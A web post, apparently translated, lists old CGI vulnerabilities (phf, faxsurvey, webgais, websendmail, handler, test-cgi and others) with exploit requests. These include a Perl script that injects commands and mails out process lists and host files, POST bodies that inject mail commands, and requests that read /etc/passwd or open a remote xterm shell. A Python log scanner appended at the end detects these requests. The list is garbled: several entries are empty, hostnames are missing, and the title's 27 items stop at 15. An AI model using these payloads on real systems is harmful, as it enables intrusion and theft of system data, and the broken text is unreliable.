Posted 14 June 2024 (author: )

27 Common CGI Vulnerabilities and Attack Methods - Computer Reference

1. The phf vulnerability

The phf vulnerability is probably the most classic one; almost every article covers it. It allows executing commands on the server, for example displaying /etc/passwd:

But can we still find it anywhere?

2. Vulnerability in version 2.0beta10 or earlier

Lets you read any file that the nobody account can read, e.g. /etc/security/passwd.

3. whois_

4. faxsurvey

5.

If the server has it installed, anyone can execute commands with the privileges of the http daemon.

#!/usr/bin/perl
$URL='/a/';
# please _DO_ _modify_ this
$EMAIL='****************.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0]; } else {
    $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=8;${CMD};echo|";
$text =~ s/ /\${IFS}/g;
#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); # if there is no wget command, lynx can be used instead
#system({"lynx"} "lynx", $text);

6. Vulnerability in some versions (1.1) of info2www

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
$
You have new mail.
$

Honestly, I don't really understand this one.

7.

lynx -source '/cgi-bin/?/../../../../etc/motd'

There is another vulnerability that allows executing commands:

or

lynx -dump

8. wrap

9. www-sql

Lets you read some restricted pages, such as:

where you would normally be asked for a username and password; with www-sql that is not necessary:

10. view-source

11. campas

12. webgais

telnet 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan@
echo'&output=subject&domain=paragraph

13. websendmail

telnet 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_address@

14. handler

telnet 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0

or

GET /cgi-bin/handler/blah;xwsh |?data=Download

or

GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download

Note: the character after cat is a TAB, not a space. The server reports that it cannot open useless_shit, but the command that follows is still executed.

15. test-cgi

CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME =
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,


text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST =
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

This reveals some of the http server's directories.

This trick doesn't seem to work anymore.

You can also try:

GET /cgi-bin/test-cgi?* HTTP/1.0

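As an added example that is not part of the original text, the list above turned into defender-side detection: a Python scanner over Common Log Format access-log lines that flags requests to the CGI programs named in sections 1 through 15 (assumed, as in the page's own requests, to sit under /cgi-bin/) and reports whether the URL-decoded request carries the shell metacharacters, traversal or glob those requests depend on. The log lines are constructed; POST bodies are not in an access log, so the webgais and websendmail cases can only be flagged by the request line itself.

```python
import re
from urllib.parse import unquote

# CGI programs named in sections 1-15 of this page; the page's requests put
# them under /cgi-bin/, so that prefix is assumed here.
RISKY_CGIS = {"phf", "faxsurvey", "info2www", "wrap", "www-sql", "view-source",
              "campas", "webgais", "websendmail", "handler", "test-cgi"}

# What the page's requests rely on, checked after URL-decoding: ";" and "|"
# (handler), TAB/newline and ${IFS}, "../" (section 7), "*" (test-cgi?*).
INJECTION = re.compile(r"[;|\n\t*]|\$\{IFS\}|\.\./")

# Common Log Format: client IP plus the quoted request line is all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)')

def scan_line(line):
    """Return (ip, cgi, reason) when a request hits a listed CGI, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m.group("target"))
    segs = target.partition("?")[0].split("/")
    if "cgi-bin" not in segs:
        return None
    i = segs.index("cgi-bin")
    cgi = segs[i + 1] if i + 1 < len(segs) else ""
    if cgi not in RISKY_CGIS:
        return None
    # POST bodies never reach the access log, so a bare POST to a listed CGI
    # is still reported, only with a weaker reason.
    if INJECTION.search(target):
        return (m.group("ip"), cgi, "shell metacharacter in request")
    return (m.group("ip"), cgi, "request to listed CGI (%s)" % m.group("method"))

def scan_log(text):
    """Scan a whole log; returns the findings in log order."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]

# Constructed sample log; the request lines follow this page's own examples.
SAMPLE_LOG = """\
10.0.0.1 - - [14/Jun/2024:10:00:00 +0000] "GET /cgi-bin/handler/useless_shit;cat%09/etc/passwd|?data=Download HTTP/1.0" 200 512
10.0.0.2 - - [14/Jun/2024:10:00:01 +0000] "POST /cgi-bin/websendmail HTTP/1.0" 200 64
10.0.0.3 - - [14/Jun/2024:10:00:02 +0000] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 300
10.0.0.4 - - [14/Jun/2024:10:00:03 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 210
10.0.0.5 - - [14/Jun/2024:10:00:04 +0000] "GET /index.html HTTP/1.0" 200 1024
"""

if __name__ == "__main__":
    for ip, cgi, reason in scan_log(SAMPLE_LOG):
        print(ip, cgi, reason)
```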